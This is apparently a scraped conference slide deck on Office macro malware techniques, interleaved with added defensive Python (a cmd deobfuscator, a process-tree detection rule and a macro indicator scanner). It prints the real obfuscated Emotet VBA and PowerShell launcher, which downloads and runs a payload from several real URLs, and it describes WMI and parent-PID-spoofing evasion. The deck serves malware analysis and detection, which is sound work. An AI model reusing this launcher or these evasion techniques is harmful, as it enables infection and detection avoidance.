Macro malware –
Common Techniques
<m4n0w4r>
9/16/2019 Macro malware - common techniques 1
#Wh0_4m_1?
1. @kienmanowar/@m4n0w4r
2. Twitter: @kienbigmummy
3. Company:
4. Blog: kienmanowar.wordpress.com
5. Writer for tradahacking.vn
Agenda
• Typical Method
• Evading Parent/Child Analysis
• Scheduled Task Creation
• Registry Modification
• Dropping Files
• Download File
Cyber Kill Chain
Model by Lockheed Martin (Intelligence-Driven Computer Network Defense)
The Typical Method
Emotet variant
https://www.virustotal.com/gui/file/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b
VBA code
Code from VBA Modules

Sub AutoOpen()
    VBA.Shell$ iphSIiNfaNjTt, 0
End Sub

Function iphSIiNfaNjTt()
    iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + _
        vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO + _
        JstYsN + sDwChEYslpP + zDTGrVwpTAR + mitjmD + ciSOwmuuE + WEPLobW + _
        vqfEdabPIV + vJOMi + UXiBTISI + dfhFU + nwoRcLWNZSV + NCMSjazF + _
        RjwDOIFiGzs + ohQcC + RlVzAwiHW + RifikIkmi + FCRNXlL
End Function

Function aPNnoXoRGKMH()
    aPNnoXoRGKMH = zilMH + pcrOzYMPXCi + WbDnCzlCK + pDUqAABFGh + lUoibmOjr + _
        KhVOwsl + HDQPmHVYiD + GzWjGEcXiX + ZwlCz + dCjRnjGNz + nlUHZPnE + _
        HEaiojkVdDO + XFjnjbjmqJl + kqjwHUq + piantJ + rbEDwpNc + QzYmE + _
        nrJILEn + ELizU + MqfiQmS + LOokRDhqqN + IalQpFoPE + WarbPVl + _
        MMjcSjVm + iruMBLDcwO + RmkFihGQtT + ArUkXJj + OBwrdhtvBW + _
        LVzEDLjRQ + DjYuFmCTTb + pTfFmQL + cqWwPkKsqz + bICZzvUpr + CrQFN + _
        hDTBAKT + OBMNt + mMIiPM + VVwsdSc + cQYjuhzP + YrjGfpqCsh + _
        LcobGJwo + sTYPbGYDlY + niSmUt + CGnOlwKbSU + cwnETzznnOA + XuaUi
End Function

Function TiaBlsUalNnM()
    TiaBlsUalNnM = TjwZuOEuD + pNnCVwPqc + nJjPqlMU + bUkkvzm + BwpYcYDBvwJ + _
        rwUqquf + HzXlmSLam + QWFwhK + uWzPz + zBMjmZtjcta + mUCjUokNWi + _
        CIEnrYmn + cNibOLwTH + pBaLfCn + EJOFwt + XBTEJrDCU + OCcJVHjp + _
        ZnaGFFBj + tXLGhr + vwOZE + mVOJSknpq + lcObnwwZdL + ANZAwiDb + _
        fbiaJQGX + qPAaHtT + fEfOho + tAIPPEJcL + zmaMGDoLTX + zDHkzGhR + _
        DrWNQJz + uPzAhno + LGziXMAdoL + WVZkI + VipSi + IAjpSiYwj + _
        hnTWVhb + ZOrnliBU
End Function
Decoded VBA call to obfuscated PowerShell
cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set
%UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set
%jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set
%DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%!
"(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect
System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd
=k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect randok9B+k9Bm;ki4T+'+'i4T9i'+'4T+i4TB+k9BrONbk9B+k9Bck'+'9B+k9Bd =
Hk9B+k9B1Ihtk9B+k9Btp:k9B+k9B//cok9B+k9i4T+i4TBffeybarn.com/Qq3sk9i4T+i4TB+k9BDS0/,ki4T+i4T9B+k9Bhttpi4T+i4T://e
asyfook9B+k9Bd.us/'+'Gk9B+k9B4Vk9B+k9BaoW/k9B'+'+k9B,https://icbk9B+'+'k9Bb.uk9B+k9Bnuk9B+k9Bdk9B+k9B.ac.ik9B+k9
Bdk9B+k9i4T+i4TB'+'/k9B+k9B0XSX0/'+'k9B+k9B,k9B+k9Bhttpki'+'4T+i4T9B+k9B://'+'fk9B+k9Bi4T+i4Testival-dk9B+i
4T+i4Tk9Bruk9B+k9'+'Bzba.'+'ck9B+k9Bom.ua'+'/k9B+k9i4T+i4TBr4Ik9B+k9Bwzk9B+k'+'9B/,http:/k9B+k9B/k9B+ki4T+i4T9Bp
lak9B+k9Bn.gotk9B+k9Beborg2021k9B+k9Bi4T+i4T.wek9B'+'+k9Bbadmini4T+i4T8.nek9i4T+i4TB+k9'+'Bt/wpk9B+k9B-
i4T+i4Tcok9B+k9Bntent/t'+'hek9B+k9Bmk9B+k9Bek9B+k9Bs/k9B+k9Bgotebk9B'+'+k9Borg/fhYk9B+k9Bmi4T+i4T/H1i4T+i4TI.Spk
9B+k'+'9Bli4T+i4'+'Tit'+'(H1I,H1'+'I);rOk9B+k9B'+'Nkarapas =
'+'rk9B+k9BONnsadasd'+'i4T+i4'+'Tk9'+'B+k9B.nk9B+k9Bek9B+k9Bxk9B+k9Btk9B+k9i4T+i4TB'+'(k9B+k9B1,
k9B+k9B3k9B+k9B4k9B+k9B3ki4T+i4T9B'+'+k9B24k9B+k9Bi4T+i4T5);rONk9B+k9Bhuas =ki4T+i'+'4T9B+k9B
rONenv:puk9B+k9Bblik9B+k9Bi4T+i4Tc + H1k9B'+'+k9B'+'IN5oH1I +k9B+k9B rk9B+k9BOk9B+k9BNkarapi4T+i4Tas +
H1I.exeH1k9B+k9BI;forek9B+k9'+'Bach(rOk9B+k9BNab'+'c ii4T+i4Tnk9B+k'+'9B
rk9B+k9BONbcd){k9B+k9Btrk9B+k9By{rON'+'f'+'ri4T+i4Tanc.Downloai4T+i4TdFi4T+i4Tile(rk9B+k9BO'+'Nk9B+k9B'+'ai4T+i4
Tbck9'+'B+k'+'9B.Tki4T'+'+i4T9B+k9Bok9i4T+i4TB+k9BString(),i4T+i4T rONhk9B+k9Buki4T+i4T9B+k9Bas);k9B+k9BInvoke-
k9B+k9BItem(k9B+k9Br'+'ONhuas)k9B+k9B;k9i4T+i
4TB+k9Bbreak9B+k9Bk;}catch{i4T+i4'+'Twritk9B+k9Bek9B+k9B'+'-k9B+k9Bh'+'k9B+k9Bost
rON'+'_.k9B+k9BEk9B+k9Bxcept'+'ion.i4T+i4TMek9B+k9Bssage;}}k9B).rEPlACE(k9BrONk9B,k9BrcWk9B).rEP'+'lACE(([chAR]7
8+[chAR]53+[chAR]111),[Si4T+i4TtrING][chAR]92).rEPlACE(([chi4T+i4TAR]72+[ch'+'AR]49+[chAR]73),[StrING][chAR]39'+
')GLo& ('+' rcWENv:p'+'uBi4T+i4TLi4T+i4TIC[13]+rcWENv:PuBLIc[5]+k9BXk9B)i4T) -
cReplaCe([Char]71+[Char]76+[Char]111'+'),[Char]124 -rEPLaCE([Char]114+[Cha'+'r]99+[Char]87),[Char]36 -
cReplaCei4Tk9Bi'+'4T,[Char]39) JYX &( ([STriNg]EzevERboSeprEFErEnCE)[1,3]+i4TXi4T-JoIni4Ti4T)') -rEPlaCe
([ChAr]69+[ChAr]122+[ChAr]101),[ChAr]36 -CrePLace([ChAr]105+[ChAr]52+[ChAr]84),[ChAr]39 -rEPlaCe
'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X')
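Reconstructing the launcher from a command line like the one above is mostly mechanical: cmd removes unquoted carets before it runs each command, the chain of `set` statements builds a variable table (in command-line mode an undefined `%name%` is left untouched, so the variable is literally called `%name%`), and `/V` makes the `!name!` references expand at execution time. The Python below is an added example, not code from the slides or from the sample, that performs those three steps on a constructed command line that copies the pattern with a harmless `echo` payload; the variable names and the payload are made up.

```python
import re

# Constructed command line in the same shape as the Emotet launcher: junk first token,
# caret-split %ComSpec%, a chain of set statements, then delayed-expansion references.
SAMPLE_CMDLINE = (
    'cmd xyzzy junk & %C^om^S^p^Ec% /V /c set %Qa%=p&&set %Qb%=o^we^r^s'
    '&&set %Qc%=^he^l^l&&set %Qd%=never_used&&!%Qa%!!%Qb%!!%Qc%! -NoP -c "echo constructed"'
)

CARET_RE = re.compile(r"\^")
# `set name=value` where the value runs up to the next command separator
SET_RE = re.compile(r"\bset\s+([^=]+?)=(.*?)(?=&&|&|$)", re.IGNORECASE | re.DOTALL)
# !name! references that /V expands when the command actually runs
DELAYED_RE = re.compile(r"!([^!]+)!")


def deobfuscate_cmd(line):
    """Return (variable_table, expanded_final_command) for a cmd /V launcher line."""
    # Phase 1: cmd strips unquoted carets, so o^we^r^s collapses to owers.
    flat = CARET_RE.sub("", line)

    # Phase 2: record every assignment. The name keeps its percent signs because
    # %Qa% was never a defined variable and therefore was not expanded.
    variables = {}
    last_end = 0
    for match in SET_RE.finditer(flat):
        variables[match.group(1).strip()] = match.group(2)
        last_end = match.end()

    # Phase 3: whatever follows the last assignment is the real command; resolve
    # each !name! from the table and leave unknown references as they are.
    tail = flat[last_end:].lstrip("& ")
    expanded = DELAYED_RE.sub(lambda m: variables.get(m.group(1), m.group(0)), tail)
    return variables, expanded


if __name__ == "__main__":
    table, command = deobfuscate_cmd(SAMPLE_CMDLINE)
    for name, value in table.items():
        print(f"{name} = {value!r}")
    print("final command:", command)
```

This handles only the cmd layer. The inner PowerShell seen above still carries its own string-replace layer (the `.rEPlACE` and `-cReplaCe` chains that swap placeholder tokens for `$`, `|` and quote characters), which needs a separate pass once the cmd layer has been unwrapped.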
Decoded powershell
Evading Parent/Child Analysis
• This parent/child behavior (an Office process directly spawning cmd.exe or PowerShell, as in the typical method above) is relatively anomalous and can easily be detected by most modern blue teams.
Spawning via WmiPrvse.exe using WMI
https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes
• The new process is spawned under “wmiprvse.exe” instead of the Office process, so the Office application is no longer its direct parent. The VBA code that does this is shown on the slide.
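Routing the launch through WMI changes only the direct parent, so a detection that keys on "Office spawned cmd.exe/PowerShell" goes quiet while the activity itself is unchanged. The Python below is an added example, not code from the slides: it runs two rules over constructed Sysmon-style process-creation events, a direct Office-parent rule and a time-correlation rule that flags a scripting host started under wmiprvse.exe, svchost.exe, explorer.exe or dllhost.exe shortly after an Office process started. The event records, PIDs and the 120-second window are assumptions.

```python
from datetime import datetime, timedelta

# Process names the rules care about (compared case-insensitively on the basename)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "schtasks.exe"}
# Parents a macro can route through so that Office is no longer the direct parent
INDIRECT_PARENTS = {"wmiprvse.exe", "svchost.exe", "explorer.exe", "dllhost.exe"}
WINDOW = timedelta(seconds=120)  # assumed correlation window

T0 = datetime(2019, 9, 16, 9, 0, 0)


def at(seconds):
    """Constructed timestamp helper: T0 plus an offset in seconds."""
    return T0 + timedelta(seconds=seconds)


# Constructed process-creation events shaped like Sysmon Event ID 1 fields (not real telemetry)
SAMPLE_EVENTS = [
    {"time": at(0), "pid": 1000, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe"},
    # typical method: Office spawns cmd.exe directly
    {"time": at(2), "pid": 1100, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE"},
    {"time": at(5), "pid": 1200, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe"},
    # WMI-routed launch: the shell's parent is WmiPrvSE.exe, not Word
    {"time": at(6), "pid": 1300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    # same parent/child pair 15 minutes later with no Office activity nearby: below the bar
    {"time": at(900), "pid": 1400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (severity, pid, reason) tuples for events matching either rule, in time order."""
    office_starts = []
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        child, parent = basename(ev["image"]), basename(ev["parent_image"])
        if child in OFFICE:
            office_starts.append(ev["time"])
        if child not in SCRIPT_HOSTS:
            continue
        if parent in OFFICE:
            # Rule 1: the direct relationship the deck calls "relatively anomalous"
            alerts.append(("high", ev["pid"], f"{parent} directly spawned {child}"))
        elif parent in INDIRECT_PARENTS and any(
                timedelta(0) <= ev["time"] - start <= WINDOW for start in office_starts):
            # Rule 2: laundered parent, but an Office process started within the window
            alerts.append(("medium", ev["pid"],
                           f"{child} under {parent} within {int(WINDOW.total_seconds())}s of an Office start"))
    return alerts


if __name__ == "__main__":
    for severity, pid, reason in detect(SAMPLE_EVENTS):
        print(f"[{severity}] pid={pid}: {reason}")
```

The same correlation is what a defender falls back on for the scheduled-task (svchost.exe) and parent-PID-spoofing cases later in the deck: with a spoofed parent the `parent_image` field itself is the value the attacker chose, so the Office start time, the document that was open and the child's command line are the reliable pivots. On a host that rarely runs WMI-driven automation, a wmiprvse.exe-spawned shell is worth a look even outside the window.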
Spawning via ShellCOM
• https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
• https://github.com/tyranid/oleviewdotnet (James Forshaw)
Spawning via ShellCOM
• Sample code using ShellBrowserWindow:
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
Spawning via ShellCOM
• Sample code using ShellWindows:
Parent PID Spoofing with CreateProcessA
• The CreateProcessA API takes a parameter called “lpStartupInfo” through which you can effectively choose the parent process the new process is reported under.
– lpStartupInfo points to a STARTUPINFOEX structure
Sample in the wild
https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/
1st stage VBA Code
Decoded base64 String
2nd VBA code (1)
dllhost.exe runs as a child of explorer.exe
2nd VBA code (2)
Scheduled Task Creation
• VBScript can create Scheduled Tasks, which can be abused so that the resulting activity is no longer tied to the Office process (svchost.exe spawns the task).
– Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger-example--scripting-
Sample in the wild
https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14
Extract out the VBA Macro code
Sub Document_Open()
Sub Document_Close()
A sample of APT32 (aka OceanLotus)
https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
Registry Modification
• VBScript also gives access to the registry, allowing payloads to be stored, settings to be modified, and persistence entries to be created directly from a macro (using WMI or WScript).
– Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--registry
Wild wild west
https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
Extract out the VBA Macro code
Write 1st decoded base64 to
"C:\ProgramData\WindowsDefender.ini"
Write 2nd decoded base64 to
"C:\ProgramData\Defender.sct"
Write 3rd decoded base64 to
"C:\ProgramData\DefenderService.inf"
LoL_Bin (Living Off The Land)
Another #OceanLotus sample
https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
VBA code
Dropping Files
• Dropping files has its pros and cons. Making changes to disk can often
mean payloads are analyzed by antivirus and leave forensic artefacts. Yet
in most breaches attackers still use payloads dropped to disk due to the
convenience and ease of having a solid foothold in a network.
• In VBScript we can make use of the FileSystemObject to drop files.
Again, another sample of #OceanLotus...
https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
VBA code…
Dropping dll file
Another sample
https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
VBA Code – Get Base64 data
VBA Code – Decode b64 and execute payload
Download file
• There are multiple ways VBScript can be used to download content. This
content can then be dropped to disk, inserted into the registry or injected
into memory.
• One of the most common and simplest methods is using the XMLHTTP
library along with ADODB to output to file.
• Another option would be to use a direct API call, for example a simple
VBScript download cradle can be implemented using
URLDownloadToFileA.
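The scheduled-task, registry, file-drop and download techniques in this deck each leave a recognisable object or API name in the macro source, so a first triage pass over the VBA extracted from a document (the "Extract out the VBA Macro code" step repeated for each sample above) can be a keyword scan. The Python below is an added example, not code from the slides or from any of the samples: it groups indicators into families, scores the combination, and folds `Chr()` concatenation chains like the one in the Emotet module back into literals before scanning. The VBA fragment it scans is constructed and intentionally does nothing; the indicator list and the scoring are assumptions, not a published rule set.

```python
import re

# Constructed VBA fragment: contains the object/API names the deck discusses but does
# nothing useful; the registry key is a placeholder. Not taken from any real sample.
SAMPLE_VBA = """\
Sub AutoOpen()
    Set http = CreateObject("MSXML2.XMLHTTP")
    Set stream = CreateObject("ADODB.Stream")
    Set svc = CreateObject("Schedule.Service")
    Set fso = CreateObject("Scripting.FileSystemObject")
    CreateObject("WScript.Shell").RegWrite "HKCU_PLACEHOLDER_KEY", "x"
    VBA.Shell$ Chr(99) & Chr(109) & Chr(100), 0
End Sub
"""

# Indicator families (assumed list); one case-insensitive regex per family
INDICATORS = {
    "auto-exec":      r"\b(?:AutoOpen|AutoClose|AutoExec|Document_Open|Document_Close|Workbook_Open)\b",
    "process-exec":   r"\bShell\$?\b|WScript\.Shell|Win32_Process|winmgmts:|ShellBrowserWindow|"
                      r"ShellWindows|CreateProcessA?\b|\bcmd(?:\.exe)?\b|powershell",
    "scheduled-task": r"Schedule\.Service",
    "registry":       r"\bRegWrite\b|StdRegProv",
    "file-drop":      r"Scripting\.FileSystemObject|ADODB\.Stream|SaveToFile",
    "download":       r"XMLHTTP|WinHttpRequest|URLDownloadToFileA?\b",
    "obfuscation":    r"\bChr\$?\(|StrReverse|\bXor\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in INDICATORS.items()}

CHR_CHAIN = re.compile(r"Chr\$?\(\d+\)(?:\s*[&+]\s*Chr\$?\(\d+\))*", re.IGNORECASE)
CHR_CODE = re.compile(r"Chr\$?\((\d+)\)", re.IGNORECASE)


def resolve_chr(source):
    """Fold Chr(n) & Chr(m) ... chains into a quoted literal so the scan sees the real string."""
    def fold(match):
        return '"' + "".join(chr(int(code)) for code in CHR_CODE.findall(match.group(0))) + '"'
    return CHR_CHAIN.sub(fold, source)


def triage_macro(source):
    """Return {family: sorted unique hits} for every indicator family present."""
    resolved = resolve_chr(source)
    hits = {}
    for family, rx in COMPILED.items():
        # obfuscation is judged on the raw text; everything else on the resolved text
        haystack = source if family == "obfuscation" else resolved
        found = sorted({m.group(0) for m in rx.finditer(haystack)})
        if found:
            hits[family] = found
    return hits


def risk_score(hits):
    """One point per family, plus one when auto-execution pairs with execution, download or task creation."""
    score = len(hits)
    if "auto-exec" in hits and {"process-exec", "download", "scheduled-task"} & set(hits):
        score += 1
    return score


if __name__ == "__main__":
    found = triage_macro(SAMPLE_VBA)
    for family, items in found.items():
        print(f"{family:15s} {', '.join(items)}")
    print("score:", risk_score(found))
```

Treat the score as a sorting key for analyst attention rather than a verdict: legitimate macros also use FileSystemObject and XMLHTTP, and a heavily obfuscated sample can avoid every literal here (the Emotet module earlier reaches Shell$ only after concatenating dozens of variables), so the strings recovered after deobfuscation, not just the raw source, are what should be scanned.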
Some sample code
Sample
https://www.virustotal.com/gui/file/e2d878a43607c04f151052e81a560a80525a343ea4e719c3a79e1cc8c45e47c5
Extract out VBA code
Extract out VBA code
Other sample
https://www.virustotal.com/gui/file/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd
VBA Code
End!
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 

Macro malware common techniques - public

  • 1. Macro malware – Common Techniques <m4n0w4r> 9/16/2019 Macro malware - common techniques 1
  • 2. #Wh0_4m_1? 1. @kienmanowar/@m4n0w4r 2. Twitter: @kienbigmummy 3. Company: 4. Blog: kienmanowar.wordpress.com 5. Writer for tradahacking.vn
  • 3. Agenda • Typical Method • Evading Parent/Child Analysis • Scheduled Task Creation • Registry Modification • Dropping Files • Download File
  • 4. Cyber Kill Chain Model by Lockheed Martin (Intelligence-Driven Computer Network Defense)
  • 5. The Typical Method
  • 6. Emotet variant https://www.virustotal.com/gui/file/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b
  • 7. VBA code
  • 8. Code from VBA Modules
    VBA.Shell$ iphSIiNfaNjTt, 0
    Function iphSIiNfaNjTt()
    iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO + JstYsN + sDwChEYslpP + zDTGrVwpTAR + mitjmD + ciSOwmuuE + WEPLobW + vqfEdabPIV + vJOMi + UXiBTISI + dfhFU + nwoRcLWNZSV + NCMSjazF + RjwDOIFiGzs + ohQcC + RlVzAwiHW + RifikIkmi + FCRNXlL
    Function aPNnoXoRGKMH()
    aPNnoXoRGKMH = zilMH + pcrOzYMPXCi + WbDnCzlCK + pDUqAABFGh + lUoibmOjr + KhVOwsl + HDQPmHVYiD + GzWjGEcXiX + ZwlCz + dCjRnjGNz + nlUHZPnE + HEaiojkVdDO + XFjnjbjmqJl + kqjwHUq + piantJ + rbEDwpNc + QzYmE + nrJILEn + ELizU + MqfiQmS + LOokRDhqqN + IalQpFoPE + WarbPVl + MMjcSjVm + iruMBLDcwO + RmkFihGQtT + ArUkXJj + OBwrdhtvBW + LVzEDLjRQ + DjYuFmCTTb + pTfFmQL + cqWwPkKsqz + bICZzvUpr + CrQFN + hDTBAKT + OBMNt + mMIiPM + VVwsdSc + cQYjuhzP + YrjGfpqCsh + LcobGJwo + sTYPbGYDlY + niSmUt + CGnOlwKbSU + cwnETzznnOA + XuaUi
    Sub AutoOpen()
    Function TiaBlsUalNnM()
    TiaBlsUalNnM = TjwZuOEuD + pNnCVwPqc + nJjPqlMU + bUkkvzm + BwpYcYDBvwJ + rwUqquf + HzXlmSLam + QWFwhK + uWzPz + zBMjmZtjcta + mUCjUokNWi + CIEnrYmn + cNibOLwTH + pBaLfCn + EJOFwt + XBTEJrDCU + OCcJVHjp + ZnaGFFBj + tXLGhr + vwOZE + mVOJSknpq + lcObnwwZdL + ANZAwiDb + fbiaJQGX + qPAaHtT + fEfOho + tAIPPEJcL + zmaMGDoLTX + zDHkzGhR + DrWNQJz + uPzAhno + LGziXMAdoL + WVZkI + VipSi + IAjpSiYwj + hnTWVhb + ZOrnliBU
  • 9. Decoded VBA call to obfuscated powershell cmd
    hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd =k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect randok9B+k9Bm;ki4T+'+'i4T9i'+'4T+i4TB+k9BrONbk9B+k9Bck'+'9B+k9Bd = Hk9B+k9B1Ihtk9B+k9Btp:k9B+k9B//cok9B+k9i4T+i4TBffeybarn.com/Qq3sk9i4T+i4TB+k9BDS0/,ki4T+i4T9B+k9Bhttpi4T+i4T://e asyfook9B+k9Bd.us/'+'Gk9B+k9B4Vk9B+k9BaoW/k9B'+'+k9B,https://icbk9B+'+'k9Bb.uk9B+k9Bnuk9B+k9Bdk9B+k9B.ac.ik9B+k9 Bdk9B+k9i4T+i4TB'+'/k9B+k9B0XSX0/'+'k9B+k9B,k9B+k9Bhttpki'+'4T+i4T9B+k9B://'+'fk9B+k9Bi4T+i4Testival-dk9B+i 4T+i4Tk9Bruk9B+k9'+'Bzba.'+'ck9B+k9Bom.ua'+'/k9B+k9i4T+i4TBr4Ik9B+k9Bwzk9B+k'+'9B/,http:/k9B+k9B/k9B+ki4T+i4T9Bp lak9B+k9Bn.gotk9B+k9Beborg2021k9B+k9Bi4T+i4T.wek9B'+'+k9Bbadmini4T+i4T8.nek9i4T+i4TB+k9'+'Bt/wpk9B+k9B- i4T+i4Tcok9B+k9Bntent/t'+'hek9B+k9Bmk9B+k9Bek9B+k9Bs/k9B+k9Bgotebk9B'+'+k9Borg/fhYk9B+k9Bmi4T+i4T/H1i4T+i4TI.Spk 9B+k'+'9Bli4T+i4'+'Tit'+'(H1I,H1'+'I);rOk9B+k9B'+'Nkarapas = '+'rk9B+k9BONnsadasd'+'i4T+i4'+'Tk9'+'B+k9B.nk9B+k9Bek9B+k9Bxk9B+k9Btk9B+k9i4T+i4TB'+'(k9B+k9B1, k9B+k9B3k9B+k9B4k9B+k9B3ki4T+i4T9B'+'+k9B24k9B+k9Bi4T+i4T5);rONk9B+k9Bhuas =ki4T+i'+'4T9B+k9B rONenv:puk9B+k9Bblik9B+k9Bi4T+i4Tc + H1k9B'+'+k9B'+'IN5oH1I +k9B+k9B rk9B+k9BOk9B+k9BNkarapi4T+i4Tas + H1I.exeH1k9B+k9BI;forek9B+k9'+'Bach(rOk9B+k9BNab'+'c ii4T+i4Tnk9B+k'+'9B rk9B+k9BONbcd){k9B+k9Btrk9B+k9By{rON'+'f'+'ri4T+i4Tanc.Downloai4T+i4TdFi4T+i4Tile(rk9B+k9BO'+'Nk9B+k9B'+'ai4T+i4 Tbck9'+'B+k'+'9B.Tki4T'+'+i4T9B+k9Bok9i4T+i4TB+k9BString(),i4T+i4T rONhk9B+k9Buki4T+i4T9B+k9Bas);k9B+k9BInvoke- k9B+k9BItem(k9B+k9Br'+'ONhuas)k9B+k9B;k9i4T+i 4TB+k9Bbreak9B+k9Bk;}catch{i4T+i4'+'Twritk9B+k9Bek9B+k9B'+'-k9B+k9Bh'+'k9B+k9Bost rON'+'_.k9B+k9BEk9B+k9Bxcept'+'ion.i4T+i4TMek9B+k9Bssage;}}k9B).rEPlACE(k9BrONk9B,k9BrcWk9B).rEP'+'lACE(([chAR]7 8+[chAR]53+[chAR]111),[Si4T+i4TtrING][chAR]92).rEPlACE(([chi4T+i4TAR]72+[ch'+'AR]49+[chAR]73),[StrING][chAR]39'+ ')GLo& ('+' rcWENv:p'+'uBi4T+i4TLi4T+i4TIC[13]+rcWENv:PuBLIc[5]+k9BXk9B)i4T) - cReplaCe([Char]71+[Char]76+[Char]111'+'),[Char]124 -rEPLaCE([Char]114+[Cha'+'r]99+[Char]87),[Char]36 - cReplaCei4Tk9Bi'+'4T,[Char]39) JYX &( ([STriNg]EzevERboSeprEFErEnCE)[1,3]+i4TXi4T-JoIni4Ti4T)') -rEPlaCe ([ChAr]69+[ChAr]122+[ChAr]101),[ChAr]36 -CrePLace([ChAr]105+[ChAr]52+[ChAr]84),[ChAr]39 -rEPlaCe 'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X')
